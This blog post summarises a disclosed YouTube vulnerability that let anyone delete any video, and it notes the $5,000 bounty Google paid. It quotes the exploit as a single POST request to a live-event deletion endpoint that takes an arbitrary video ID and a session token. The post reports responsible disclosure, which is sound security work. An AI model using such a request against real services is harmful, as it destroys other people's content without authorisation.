Deleting any video from Youtube

Similar to my previous blog entry, this is a blog about a lad who discovered a vulnerability and disclosed it to the company running the site. In this case, a Russian lad had discovered a way to remove any video from Youtube.com (a big deal obviously). This was done with a simple request made by the user:

POST https://www.youtube.com/live_events_edit_status_ajax?action_delete_live_event=1

event_id: ANY_VIDEO_ID
session_token: YOUR_TOKEN

In response to the disclosure of this bug, Google rewarded $5,000. A small reward for such a massive flaw in the system. (at least in my opinion)

http://kamil.hism.ru/posts/about-vrg-and-delete-any-youtube-video-issue.html

Advertisements
Deleting any video from Youtube

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s